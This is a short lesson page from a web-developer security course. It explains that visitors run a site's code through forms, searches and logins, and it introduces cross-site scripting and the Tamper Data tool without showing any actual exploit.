[ Security for Web Developers ] :: 06: Security on Your Site

Users run code (hopefully your code) when they:

  • Load any “active” page (.php, .py, .asp etc.)
  • Fill out forms
  • Search
  • Buy something
  • Create an account
  • Log in to an account

If you wrote the code, you know all too well that you’re letting visitors run it. If the site uses a database, users are touching it, directly or indirectly. What goes into the database is entirely your responsibility. Consider cross-site scripting, for instance: do you know how to prevent or detect it?

Tamper Data is a simple tool for (you guessed it) tampering with the data your browser sends to a web server (and vice-versa). Here’s an outdated example for the sake of simplicity:

This exploit won’t work in most places any more, but it’s a good illustration of how and why people will tamper with your site.

Next: http://schoolforhackers.com/security-web-developers-07-tamper-data/